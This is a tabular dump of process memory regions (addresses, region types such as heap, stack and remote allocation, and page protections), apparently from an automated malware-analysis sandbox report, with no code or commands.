|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3241000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
12C4000
|
trusted library allocation
|
page read and write
|
||
|
211938E0000
|
heap
|
page read and write
|
||
|
20BD97AE000
|
heap
|
page read and write
|
||
|
1D8AFA1D000
|
heap
|
page read and write
|
||
|
238111D0000
|
heap
|
page read and write
|
||
|
5D5B000
|
trusted library allocation
|
page read and write
|
||
|
AA49D4E000
|
stack
|
page read and write
|
||
|
20BD7460000
|
heap
|
page read and write
|
||
|
12EA6FC000
|
stack
|
page read and write
|
||
|
1C93C48F000
|
heap
|
page read and write
|
||
|
1C941873000
|
trusted library allocation
|
page read and write
|
||
|
2380F1CC000
|
heap
|
page read and write
|
||
|
238110D6000
|
heap
|
page read and write
|
||
|
20BDA052000
|
heap
|
page read and write
|
||
|
1C93CC15000
|
heap
|
page read and write
|
||
|
ECB000
|
stack
|
page read and write
|
||
|
1C93C42B000
|
heap
|
page read and write
|
||
|
87AA64D000
|
stack
|
page read and write
|
||
|
32A1000
|
trusted library allocation
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
1D897EFF000
|
trusted library allocation
|
page read and write
|
||
|
1E683C01000
|
trusted library allocation
|
page read and write
|
||
|
51818FE000
|
stack
|
page read and write
|
||
|
7FFB11296000
|
trusted library allocation
|
page read and write
|
||
|
20BD9F97000
|
heap
|
page read and write
|
||
|
5783000
|
heap
|
page read and write
|
||
|
238110AE000
|
heap
|
page read and write
|
||
|
1C941890000
|
trusted library allocation
|
page read and write
|
||
|
87A99FE000
|
stack
|
page read and write
|
||
|
1D897AB5000
|
trusted library allocation
|
page read and write
|
||
|
1D897450000
|
heap
|
page execute and read and write
|
||
|
7FFB118E0000
|
trusted library allocation
|
page read and write
|
||
|
20BDA070000
|
heap
|
page read and write
|
||
|
211958DA000
|
heap
|
page read and write
|
||
|
238110D4000
|
heap
|
page read and write
|
||
|
328A000
|
trusted library allocation
|
page read and write
|
||
|
20BDA075000
|
heap
|
page read and write
|
||
|
20BD93C0000
|
heap
|
page read and write
|
||
|
1D8959FF000
|
heap
|
page read and write
|
||
|
21193900000
|
heap
|
page read and write
|
||
|
211958F4000
|
heap
|
page read and write
|
||
|
1C941B19000
|
heap
|
page read and write
|
||
|
7FFB114F8000
|
trusted library allocation
|
page read and write
|
||
|
20BD9870000
|
heap
|
page read and write
|
||
|
1D8959B0000
|
heap
|
page read and write
|
||
|
2380F1F5000
|
heap
|
page read and write
|
||
|
20BD93B2000
|
heap
|
page read and write
|
||
|
20BD98F0000
|
heap
|
page read and write
|
||
|
211976A0000
|
trusted library allocation
|
page read and write
|
||
|
23812FD0000
|
trusted library allocation
|
page read and write
|
||
|
20BDA06C000
|
heap
|
page read and write
|
||
|
7FFB11210000
|
trusted library allocation
|
page read and write
|
||
|
2380F320000
|
heap
|
page read and write
|
||
|
1C93C441000
|
heap
|
page read and write
|
||
|
B76EAFE000
|
stack
|
page read and write
|
||
|
87A9AF9000
|
stack
|
page read and write
|
||
|
2119392B000
|
heap
|
page read and write
|
||
|
23811110000
|
heap
|
page read and write
|
||
|
238110E7000
|
heap
|
page read and write
|
||
|
87A95FE000
|
stack
|
page read and write
|
||
|
5D6E000
|
trusted library allocation
|
page read and write
|
||
|
1D898086000
|
trusted library allocation
|
page read and write
|
||
|
238110D7000
|
heap
|
page read and write
|
||
|
1D8A7949000
|
trusted library allocation
|
page read and write
|
||
|
12E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB112A0000
|
trusted library allocation
|
page read and write
|
||
|
AA4A6B8000
|
stack
|
page read and write
|
||
|
20BDA070000
|
heap
|
page read and write
|
||
|
7FFB11700000
|
trusted library allocation
|
page read and write
|
||
|
1C93D140000
|
trusted library allocation
|
page read and write
|
||
|
20BD93D8000
|
heap
|
page read and write
|
||
|
1C93C4A2000
|
heap
|
page read and write
|
||
|
1D897965000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
7FFB11270000
|
trusted library allocation
|
page read and write
|
||
|
3278000
|
trusted library allocation
|
page read and write
|
||
|
1C941A2F000
|
heap
|
page read and write
|
||
|
170A9C20000
|
direct allocation
|
page read and write
|
||
|
21193B00000
|
heap
|
page read and write
|
||
|
20BD974F000
|
heap
|
page read and write
|
||
|
1D8A79CC000
|
trusted library allocation
|
page read and write
|
||
|
20BD93D9000
|
heap
|
page read and write
|
||
|
20BDA0B3000
|
heap
|
page read and write
|
||
|
1395000
|
heap
|
page read and write
|
||
|
20BD96F9000
|
heap
|
page read and write
|
||
|
23810FD0000
|
heap
|
page read and write
|
||
|
7FFB1131C000
|
trusted library allocation
|
page read and write
|
||
|
1310000
|
trusted library allocation
|
page read and write
|
||
|
20BD93BA000
|
heap
|
page read and write
|
||
|
1D897D0A000
|
trusted library allocation
|
page read and write
|
||
|
21195943000
|
heap
|
page read and write
|
||
|
20BD77D0000
|
heap
|
page read and write
|
||
|
1C93C529000
|
heap
|
page read and write
|
||
|
20BD7677000
|
heap
|
page read and write
|
||
|
21193921000
|
heap
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
12A0000
|
trusted library allocation
|
page read and write
|
||
|
51815FF000
|
stack
|
page read and write
|
||
|
1D895A03000
|
heap
|
page read and write
|
||
|
12EA7FE000
|
unkown
|
page readonly
|
||
|
7FFB1130D000
|
trusted library allocation
|
page read and write
|
||
|
12DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
20BD93D7000
|
heap
|
page read and write
|
||
|
1C941B1B000
|
heap
|
page read and write
|
||
|
CB023FA000
|
stack
|
page read and write
|
||
|
7FFB11490000
|
trusted library allocation
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
20BD9727000
|
heap
|
page read and write
|
||
|
1E682801000
|
trusted library allocation
|
page read and write
|
||
|
5D76000
|
trusted library allocation
|
page read and write
|
||
|
1C942000000
|
heap
|
page read and write
|
||
|
20BD96B0000
|
heap
|
page read and write
|
||
|
AA4A63E000
|
stack
|
page read and write
|
||
|
20BD9736000
|
heap
|
page read and write
|
||
|
1C941A92000
|
heap
|
page read and write
|
||
|
238110A5000
|
heap
|
page read and write
|
||
|
20BD9650000
|
remote allocation
|
page read and write
|
||
|
1C93CC00000
|
heap
|
page read and write
|
||
|
21193AF5000
|
heap
|
page read and write
|
||
|
1C941A63000
|
heap
|
page read and write
|
||
|
20BD93CA000
|
heap
|
page read and write
|
||
|
21193AF0000
|
heap
|
page read and write
|
||
|
1C93CD1A000
|
heap
|
page read and write
|
||
|
7FFB11890000
|
trusted library allocation
|
page read and write
|
||
|
20BD9722000
|
heap
|
page read and write
|
||
|
7FFB11060000
|
trusted library allocation
|
page read and write
|
||
|
2381113B000
|
heap
|
page read and write
|
||
|
1D897ABB000
|
trusted library allocation
|
page read and write
|
||
|
12EB27E000
|
stack
|
page read and write
|
||
|
7FFB11370000
|
trusted library allocation
|
page read and write
|
||
|
1250000
|
heap
|
page read and write
|
||
|
20BD7658000
|
heap
|
page read and write
|
||
|
20BD977C000
|
heap
|
page read and write
|
||
|
20BD93CE000
|
heap
|
page read and write
|
||
|
B76F1FB000
|
stack
|
page read and write
|
||
|
1C941850000
|
trusted library allocation
|
page read and write
|
||
|
87A967E000
|
stack
|
page read and write
|
||
|
B76F0FD000
|
stack
|
page read and write
|
||
|
20BD9F5B000
|
heap
|
page read and write
|
||
|
1E689E01000
|
trusted library allocation
|
page read and write
|
||
|
12EA4FE000
|
stack
|
page read and write
|
||
|
20BD7658000
|
heap
|
page read and write
|
||
|
1D897A65000
|
trusted library allocation
|
page read and write
|
||
|
12EB47E000
|
stack
|
page read and write
|
||
|
211958C5000
|
heap
|
page read and write
|
||
|
1D895AD0000
|
heap
|
page read and write
|
||
|
211958F7000
|
heap
|
page read and write
|
||
|
7FFB1110C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB113C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11730000
|
trusted library allocation
|
page read and write
|
||
|
20BDA0AA000
|
heap
|
page read and write
|
||
|
20BD76D0000
|
heap
|
page read and write
|
||
|
1D895990000
|
heap
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
20BDA097000
|
heap
|
page read and write
|
||
|
1C93C47C000
|
heap
|
page read and write
|
||
|
12F7000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB116D0000
|
trusted library allocation
|
page read and write
|
||
|
20BDA060000
|
heap
|
page read and write
|
||
|
12EB3FE000
|
unkown
|
page readonly
|
||
|
1D8959FD000
|
heap
|
page read and write
|
||
|
5ECE000
|
stack
|
page read and write
|
||
|
1D8973C0000
|
trusted library allocation
|
page read and write
|
||
|
328C000
|
trusted library allocation
|
page read and write
|
||
|
238110D0000
|
heap
|
page read and write
|
||
|
1E680A01000
|
trusted library allocation
|
page read and write
|
||
|
7FFB112FC000
|
trusted library allocation
|
page read and write
|
||
|
211957F0000
|
heap
|
page read and write
|
||
|
1630000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB11170000
|
trusted library allocation
|
page execute and read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
7FFB113A0000
|
trusted library allocation
|
page read and write
|
||
|
12EBAFE000
|
unkown
|
page readonly
|
||
|
7FFB11380000
|
trusted library allocation
|
page execute and read and write
|
||
|
20BD75F0000
|
heap
|
page read and write
|
||
|
1D897457000
|
heap
|
page execute and read and write
|
||
|
7FFB116F6000
|
trusted library allocation
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
20BD76D0000
|
heap
|
page read and write
|
||
|
1C9419F0000
|
remote allocation
|
page read and write
|
||
|
7FFB117B0000
|
trusted library allocation
|
page read and write
|
||
|
AA4A0FA000
|
stack
|
page read and write
|
||
|
6003000
|
trusted library allocation
|
page read and write
|
||
|
5FCD000
|
stack
|
page read and write
|
||
|
1C9419A0000
|
trusted library allocation
|
page read and write
|
||
|
2380F2C0000
|
heap
|
page read and write
|
||
|
7FFB113D0000
|
trusted library allocation
|
page read and write
|
||
|
2380F1C0000
|
heap
|
page read and write
|
||
|
2380F180000
|
heap
|
page read and write
|
||
|
87AA4CF000
|
stack
|
page read and write
|
||
|
6260000
|
trusted library allocation
|
page execute and read and write
|
||
|
1780000
|
heap
|
page read and write
|
||
|
CB028FF000
|
stack
|
page read and write
|
||
|
1E683201000
|
trusted library allocation
|
page read and write
|
||
|
2380F1CC000
|
heap
|
page read and write
|
||
|
12EA2F7000
|
stack
|
page read and write
|
||
|
1C941860000
|
trusted library allocation
|
page read and write
|
||
|
6010000
|
trusted library allocation
|
page read and write
|
||
|
1E688A01000
|
trusted library allocation
|
page read and write
|
||
|
5C0E000
|
stack
|
page read and write
|
||
|
20BDA07E000
|
heap
|
page read and write
|
||
|
20BD9A60000
|
trusted library allocation
|
page read and write
|
||
|
1D897F34000
|
trusted library allocation
|
page read and write
|
||
|
12F0000
|
trusted library allocation
|
page read and write
|
||
|
1D8AFDE2000
|
heap
|
page read and write
|
||
|
1C941A22000
|
heap
|
page read and write
|
||
|
21195958000
|
heap
|
page read and write
|
||
|
1D8AF9FF000
|
heap
|
page read and write
|
||
|
17B0000
|
heap
|
page read and write
|
||
|
2380F470000
|
heap
|
page read and write
|
||
|
20BD93BD000
|
heap
|
page read and write
|
||
|
20BD97AE000
|
heap
|
page read and write
|
||
|
3280000
|
trusted library allocation
|
page read and write
|
||
|
20BD7790000
|
heap
|
page read and write
|
||
|
12EC2FE000
|
unkown
|
page readonly
|
||
|
12EB67E000
|
stack
|
page read and write
|
||
|
1C941940000
|
trusted library allocation
|
page read and write
|
||
|
1C93D410000
|
trusted library section
|
page readonly
|
||
|
20BD77D5000
|
heap
|
page read and write
|
||
|
1D89796D000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11560000
|
trusted library allocation
|
page read and write
|
||
|
1D8AF960000
|
heap
|
page read and write
|
||
|
12EB5FE000
|
unkown
|
page readonly
|
||
|
238111D6000
|
heap
|
page read and write
|
||
|
1D897D3C000
|
trusted library allocation
|
page read and write
|
||
|
1C9418A0000
|
trusted library allocation
|
page read and write
|
||
|
211958D2000
|
heap
|
page read and write
|
||
|
20BD9715000
|
heap
|
page read and write
|
||
|
1C9418B4000
|
trusted library allocation
|
page read and write
|
||
|
20BD93B5000
|
heap
|
page read and write
|
||
|
1D897C22000
|
trusted library allocation
|
page read and write
|
||
|
B76EDFF000
|
stack
|
page read and write
|
||
|
211958F7000
|
heap
|
page read and write
|
||
|
12EA8FC000
|
stack
|
page read and write
|
||
|
21193921000
|
heap
|
page read and write
|
||
|
238110E0000
|
heap
|
page read and write
|
||
|
2381113B000
|
heap
|
page read and write
|
||
|
7FFB112D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11550000
|
trusted library allocation
|
page read and write
|
||
|
1C941B1B000
|
heap
|
page read and write
|
||
|
20BDA096000
|
heap
|
page read and write
|
||
|
12EA5FE000
|
unkown
|
page readonly
|
||
|
7FFB11660000
|
trusted library allocation
|
page read and write
|
||
|
1E681401000
|
trusted library allocation
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
1C93CD02000
|
heap
|
page read and write
|
||
|
12EAF7E000
|
stack
|
page read and write
|
||
|
7FFB11400000
|
trusted library allocation
|
page read and write
|
||
|
5FD0000
|
trusted library allocation
|
page read and write
|
||
|
1C941897000
|
trusted library allocation
|
page read and write
|
||
|
12EABFE000
|
unkown
|
page readonly
|
||
|
1C93C4BD000
|
heap
|
page read and write
|
||
|
2381113B000
|
heap
|
page read and write
|
||
|
1C93CD0C000
|
heap
|
page read and write
|
||
|
20BD93E0000
|
heap
|
page read and write
|
||
|
1D897CED000
|
trusted library allocation
|
page read and write
|
||
|
1C93C3D0000
|
trusted library section
|
page read and write
|
||
|
7FFB11293000
|
trusted library allocation
|
page read and write
|
||
|
20BD9E7E000
|
heap
|
page read and write
|
||
|
87AA5CE000
|
stack
|
page read and write
|
||
|
7FFB11870000
|
trusted library allocation
|
page read and write
|
||
|
3030000
|
heap
|
page execute and read and write
|
||
|
7FFB1106B000
|
trusted library allocation
|
page read and write
|
||
|
2381113B000
|
heap
|
page read and write
|
||
|
20BD7672000
|
heap
|
page read and write
|
||
|
20BD93D2000
|
heap
|
page read and write
|
||
|
7FFB118A0000
|
trusted library allocation
|
page read and write
|
||
|
1C93D450000
|
trusted library section
|
page readonly
|
||
|
170A9A80000
|
heap
|
page read and write
|
||
|
1397000
|
heap
|
page read and write
|
||
|
1C93D460000
|
trusted library section
|
page readonly
|
||
|
1E68A801000
|
trusted library allocation
|
page read and write
|
||
|
20BD9F28000
|
heap
|
page read and write
|
||
|
1C9419B0000
|
trusted library allocation
|
page read and write
|
||
|
1D897CCD000
|
trusted library allocation
|
page read and write
|
||
|
238113D1000
|
heap
|
page read and write
|
||
|
7FFB11510000
|
trusted library allocation
|
page read and write
|
||
|
2119592B000
|
heap
|
page read and write
|
||
|
B76F6FB000
|
stack
|
page read and write
|
||
|
1C93C473000
|
heap
|
page read and write
|
||
|
238110B1000
|
heap
|
page read and write
|
||
|
20BD76B0000
|
heap
|
page read and write
|
||
|
1C93C45B000
|
heap
|
page read and write
|
||
|
20BD93B4000
|
heap
|
page read and write
|
||
|
7FFB113B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB11317000
|
trusted library allocation
|
page read and write
|
||
|
5D49000
|
stack
|
page read and write
|
||
|
1D8AF967000
|
heap
|
page read and write
|
||
|
7FFB11750000
|
trusted library allocation
|
page read and write
|
||
|
7FFB112E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11330000
|
trusted library allocation
|
page read and write
|
||
|
238110FB000
|
heap
|
page read and write
|
||
|
1C9419C0000
|
trusted library allocation
|
page read and write
|
||
|
12EB7FA000
|
stack
|
page read and write
|
||
|
1C93C4FF000
|
heap
|
page read and write
|
||
|
B76F4FF000
|
stack
|
page read and write
|
||
|
2381113B000
|
heap
|
page read and write
|
||
|
20BD93B3000
|
heap
|
page read and write
|
||
|
7FFB11200000
|
trusted library allocation
|
page read and write
|
||
|
20BDA09A000
|
heap
|
page read and write
|
||
|
1D895A45000
|
heap
|
page read and write
|
||
|
1D897941000
|
trusted library allocation
|
page read and write
|
||
|
170A9C54000
|
heap
|
page read and write
|
||
|
20BD971E000
|
heap
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
12EADFE000
|
unkown
|
page readonly
|
||
|
21195DF1000
|
heap
|
page read and write
|
||
|
1C93C290000
|
heap
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
69E0000
|
heap
|
page read and write
|
||
|
7FFB11530000
|
trusted library allocation
|
page read and write
|
||
|
1C941ADF000
|
heap
|
page read and write
|
||
|
1E689401000
|
trusted library allocation
|
page read and write
|
||
|
FC7000
|
stack
|
page read and write
|
||
|
23811104000
|
heap
|
page read and write
|
||
|
7FFB116C0000
|
trusted library allocation
|
page read and write
|
||
|
5770000
|
trusted library allocation
|
page read and write
|
||
|
1C9419C0000
|
trusted library allocation
|
page read and write
|
||
|
3000000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11323000
|
trusted library allocation
|
page read and write
|
||
|
12EB37E000
|
stack
|
page read and write
|
||
|
7FFB11610000
|
trusted library allocation
|
page read and write
|
||
|
CB027FE000
|
stack
|
page read and write
|
||
|
3276000
|
trusted library allocation
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
21195920000
|
heap
|
page read and write
|
||
|
20BD7685000
|
heap
|
page read and write
|
||
|
7FFB11335000
|
trusted library allocation
|
page read and write
|
||
|
5C4A000
|
stack
|
page read and write
|
||
|
12EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D897F36000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11780000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11054000
|
trusted library allocation
|
page read and write
|
||
|
12EB07E000
|
stack
|
page read and write
|
||
|
1D895A3E000
|
heap
|
page read and write
|
||
|
20BD76A2000
|
heap
|
page read and write
|
||
|
7FFB11410000
|
trusted library allocation
|
page execute and read and write
|
||
|
21195CC5000
|
heap
|
page read and write
|
||
|
1C93D330000
|
trusted library allocation
|
page read and write
|
||
|
1C941A43000
|
heap
|
page read and write
|
||
|
1C93D7E0000
|
trusted library allocation
|
page read and write
|
||
|
5780000
|
heap
|
page read and write
|
||
|
12F2000
|
trusted library allocation
|
page read and write
|
||
|
12EAE7E000
|
stack
|
page read and write
|
||
|
211957F1000
|
heap
|
page read and write
|
||
|
246AB3D000
|
stack
|
page read and write
|
||
|
7FFB11340000
|
trusted library allocation
|
page read and write
|
||
|
2F60000
|
trusted library allocation
|
page read and write
|
||
|
21195951000
|
heap
|
page read and write
|
||
|
20BD9726000
|
heap
|
page read and write
|
||
|
211958DA000
|
heap
|
page read and write
|
||
|
12D0000
|
trusted library allocation
|
page read and write
|
||
|
AA4A07E000
|
stack
|
page read and write
|
||
|
1C93CD13000
|
heap
|
page read and write
|
||
|
1C941B0E000
|
heap
|
page read and write
|
||
|
238110FB000
|
heap
|
page read and write
|
||
|
2119592B000
|
heap
|
page read and write
|
||
|
7FFB117C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5FFD000
|
trusted library allocation
|
page read and write
|
||
|
12EB57E000
|
stack
|
page read and write
|
||
|
7FFB118B0000
|
trusted library allocation
|
page read and write
|
||
|
AA4A17E000
|
stack
|
page read and write
|
||
|
1D895B80000
|
heap
|
page read and write
|
||
|
7FFB1126B000
|
trusted library allocation
|
page read and write
|
||
|
12EB8FE000
|
unkown
|
page readonly
|
||
|
E50000
|
heap
|
page read and write
|
||
|
7FFB11390000
|
trusted library allocation
|
page read and write
|
||
|
20BDA061000
|
heap
|
page read and write
|
||
|
7FFB11650000
|
trusted library allocation
|
page read and write
|
||
|
7FFB114B0000
|
trusted library allocation
|
page read and write
|
||
|
1D8979BE000
|
trusted library allocation
|
page read and write
|
||
|
1C94189F000
|
trusted library allocation
|
page read and write
|
||
|
2119591B000
|
heap
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
7FFB11136000
|
trusted library allocation
|
page execute and read and write
|
||
|
2380F030000
|
heap
|
page read and write
|
||
|
20BD9F60000
|
heap
|
page read and write
|
||
|
1360000
|
heap
|
page read and write
|
||
|
2380F1BB000
|
heap
|
page read and write
|
||
|
1D895B85000
|
heap
|
page read and write
|
||
|
1C9419F0000
|
remote allocation
|
page read and write
|
||
|
1D8AF9C7000
|
heap
|
page read and write
|
||
|
2119392B000
|
heap
|
page read and write
|
||
|
20BD767C000
|
heap
|
page read and write
|
||
|
20BD976F000
|
heap
|
page read and write
|
||
|
1E680001000
|
trusted library allocation
|
page read and write
|
||
|
CB026FF000
|
stack
|
page read and write
|
||
|
7FFB112F8000
|
trusted library allocation
|
page read and write
|
||
|
E40000
|
heap
|
page read and write
|
||
|
1D89809F000
|
trusted library allocation
|
page read and write
|
||
|
238110E7000
|
heap
|
page read and write
|
||
|
7FFB1130A000
|
trusted library allocation
|
page read and write
|
||
|
20BDA09E000
|
heap
|
page read and write
|
||
|
20BD9776000
|
heap
|
page read and write
|
||
|
606D000
|
stack
|
page read and write
|
||
|
2119591B000
|
heap
|
page read and write
|
||
|
87A9121000
|
stack
|
page read and write
|
||
|
21193860000
|
heap
|
page read and write
|
||
|
20BD9F5F000
|
heap
|
page read and write
|
||
|
7FFB1127A000
|
trusted library allocation
|
page read and write
|
||
|
1D8A7941000
|
trusted library allocation
|
page read and write
|
||
|
12B0000
|
heap
|
page read and write
|
||
|
20BD761B000
|
heap
|
page read and write
|
||
|
1C9417F0000
|
trusted library allocation
|
page read and write
|
||
|
16D0000
|
heap
|
page read and write
|
||
|
20BD93F7000
|
heap
|
page read and write
|
||
|
7FFB11880000
|
trusted library allocation
|
page read and write
|
||
|
23811137000
|
heap
|
page read and write
|
||
|
170A9D60000
|
heap
|
page read and write
|
||
|
1C9419D0000
|
trusted library allocation
|
page read and write
|
||
|
5ACE000
|
stack
|
page read and write
|
||
|
7FFB111F0000
|
trusted library allocation
|
page read and write
|
||
|
23811130000
|
heap
|
page read and write
|
||
|
23810FD1000
|
heap
|
page read and write
|
||
|
170A9C68000
|
heap
|
page read and write
|
||
|
1C93CE01000
|
trusted library allocation
|
page read and write
|
||
|
1D897A68000
|
trusted library allocation
|
page read and write
|
||
|
20BD93B5000
|
heap
|
page read and write
|
||
|
12EB9FB000
|
stack
|
page read and write
|
||
|
7FFB11600000
|
trusted library allocation
|
page read and write
|
||
|
51819FE000
|
stack
|
page read and write
|
||
|
1C93C400000
|
heap
|
page read and write
|
||
|
12E9D0B000
|
stack
|
page read and write
|
||
|
2380F324000
|
heap
|
page read and write
|
||
|
20BD76B1000
|
heap
|
page read and write
|
||
|
170A9C50000
|
heap
|
page read and write
|
||
|
238110E4000
|
heap
|
page read and write
|
||
|
1D897D4F000
|
trusted library allocation
|
page read and write
|
||
|
1C941940000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11540000
|
trusted library allocation
|
page read and write
|
||
|
1C93D7B1000
|
trusted library allocation
|
page read and write
|
||
|
2381111C000
|
heap
|
page read and write
|
||
|
3009000
|
trusted library allocation
|
page read and write
|
||
|
20BD7690000
|
heap
|
page read and write
|
||
|
238110F8000
|
heap
|
page read and write
|
||
|
1E68B201000
|
trusted library allocation
|
page read and write
|
||
|
20BDA093000
|
heap
|
page read and write
|
||
|
59CE000
|
stack
|
page read and write
|
||
|
87A947E000
|
stack
|
page read and write
|
||
|
20BD76B0000
|
heap
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
20BD93DE000
|
heap
|
page read and write
|
||
|
B76EBFE000
|
stack
|
page read and write
|
||
|
533E000
|
stack
|
page read and write
|
||
|
2381113B000
|
heap
|
page read and write
|
||
|
5B0D000
|
stack
|
page read and write
|
||
|
7FFB11840000
|
trusted library allocation
|
page read and write
|
||
|
1C93CD1B000
|
heap
|
page read and write
|
||
|
20BDA065000
|
heap
|
page read and write
|
||
|
1C93C513000
|
heap
|
page read and write
|
||
|
1D895B50000
|
trusted library allocation
|
page read and write
|
||
|
20BD9715000
|
heap
|
page read and write
|
||
|
51814FF000
|
stack
|
page read and write
|
||
|
12C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C941950000
|
trusted library allocation
|
page read and write
|
||
|
87A9876000
|
stack
|
page read and write
|
||
|
AA4A5BF000
|
stack
|
page read and write
|
||
|
211958F2000
|
heap
|
page read and write
|
||
|
7FFB11050000
|
trusted library allocation
|
page read and write
|
||
|
20BD9910000
|
heap
|
page read and write
|
||
|
12EBBFB000
|
stack
|
page read and write
|
||
|
7FFB1105D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB11680000
|
trusted library allocation
|
page read and write
|
||
|
2381110B000
|
heap
|
page read and write
|
||
|
1C941A00000
|
heap
|
page read and write
|
||
|
7FFB11720000
|
trusted library allocation
|
page read and write
|
||
|
20BD93F7000
|
heap
|
page read and write
|
||
|
1C941B02000
|
heap
|
page read and write
|
||
|
246AFFF000
|
stack
|
page read and write
|
||
|
23810F80000
|
heap
|
page read and write
|
||
|
238111D4000
|
heap
|
page read and write
|
||
|
7FFB1151A000
|
trusted library allocation
|
page read and write
|
||
|
211959F0000
|
heap
|
page read and write
|
||
|
12EAFFE000
|
unkown
|
page readonly
|
||
|
2119391C000
|
heap
|
page read and write
|
||
|
20BD971D000
|
heap
|
page read and write
|
||
|
238111D4000
|
heap
|
page read and write
|
||
|
1D895A40000
|
heap
|
page read and write
|
||
|
20BD7649000
|
heap
|
page read and write
|
||
|
1D897930000
|
heap
|
page execute and read and write
|
||
|
211958FC000
|
heap
|
page read and write
|
||
|
1C941870000
|
trusted library allocation
|
page read and write
|
||
|
1C941B22000
|
heap
|
page read and write
|
||
|
20BD762F000
|
heap
|
page read and write
|
||
|
1D8AFBDF000
|
heap
|
page read and write
|
||
|
238110B1000
|
heap
|
page read and write
|
||
|
2380F475000
|
heap
|
page read and write
|
||
|
12EB6FE000
|
unkown
|
page readonly
|
||
|
1D8AFAD0000
|
heap
|
page execute and read and write
|
||
|
5D62000
|
trusted library allocation
|
page read and write
|
||
|
1D897F86000
|
trusted library allocation
|
page read and write
|
||
|
313E000
|
stack
|
page read and write
|
||
|
12FB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB11106000
|
trusted library allocation
|
page read and write
|
||
|
AA4A2FE000
|
stack
|
page read and write
|
||
|
1D897BDA000
|
trusted library allocation
|
page read and write
|
||
|
23811100000
|
heap
|
page read and write
|
||
|
23811128000
|
heap
|
page read and write
|
||
|
1368000
|
heap
|
page read and write
|
||
|
2119593D000
|
heap
|
page read and write
|
||
|
20BD9F5F000
|
heap
|
page read and write
|
||
|
20BD974F000
|
heap
|
page read and write
|
||
|
238115D1000
|
heap
|
page read and write
|
||
|
1D897D18000
|
trusted library allocation
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
21195907000
|
heap
|
page read and write
|
||
|
7DF4A2EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20BD9A50000
|
heap
|
page read and write
|
||
|
170A9BE0000
|
heap
|
page read and write
|
||
|
1C93CD1A000
|
heap
|
page read and write
|
||
|
621C000
|
stack
|
page read and write
|
||
|
1C93D440000
|
trusted library section
|
page readonly
|
||
|
B76F2FE000
|
stack
|
page read and write
|
||
|
16C0000
|
trusted library allocation
|
page read and write
|
||
|
2380F1A8000
|
heap
|
page read and write
|
||
|
87A96FE000
|
stack
|
page read and write
|
||
|
20BD76A2000
|
heap
|
page read and write
|
||
|
1C93C220000
|
heap
|
page read and write
|
||
|
20BD7678000
|
heap
|
page read and write
|
||
|
2380F1C6000
|
heap
|
page read and write
|
||
|
2381110B000
|
heap
|
page read and write
|
||
|
21195949000
|
heap
|
page read and write
|
||
|
2119393C000
|
heap
|
page read and write
|
||
|
12CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
12B5000
|
heap
|
page read and write
|
||
|
1D897340000
|
heap
|
page readonly
|
||
|
2380F1C6000
|
heap
|
page read and write
|
||
|
12E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C941A56000
|
heap
|
page read and write
|
||
|
69D0000
|
heap
|
page read and write
|
||
|
7FFB116A0000
|
trusted library allocation
|
page read and write
|
||
|
20BD9F5F000
|
heap
|
page read and write
|
||
|
7FFB112DD000
|
trusted library allocation
|
page read and write
|
||
|
7FFB114A0000
|
trusted library allocation
|
page read and write
|
||
|
20BD97F0000
|
heap
|
page read and write
|
||
|
4269000
|
trusted library allocation
|
page read and write
|
||
|
1D897A6B000
|
trusted library allocation
|
page read and write
|
||
|
1D8A79C8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11350000
|
trusted library allocation
|
page read and write
|
||
|
1D897D70000
|
trusted library allocation
|
page read and write
|
||
|
20BD96F9000
|
heap
|
page read and write
|
||
|
7FFB115F6000
|
trusted library allocation
|
page read and write
|
||
|
238110E7000
|
heap
|
page read and write
|
||
|
1C93C491000
|
heap
|
page read and write
|
||
|
1C93C380000
|
unclassified section
|
page readonly
|
||
|
87A91AE000
|
stack
|
page read and write
|
||
|
87A997F000
|
stack
|
page read and write
|
||
|
CB029FF000
|
stack
|
page read and write
|
||
|
7FFB115F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB11770000
|
trusted library allocation
|
page read and write
|
||
|
23811123000
|
heap
|
page read and write
|
||
|
2119592B000
|
heap
|
page read and write
|
||
|
7FFB11850000
|
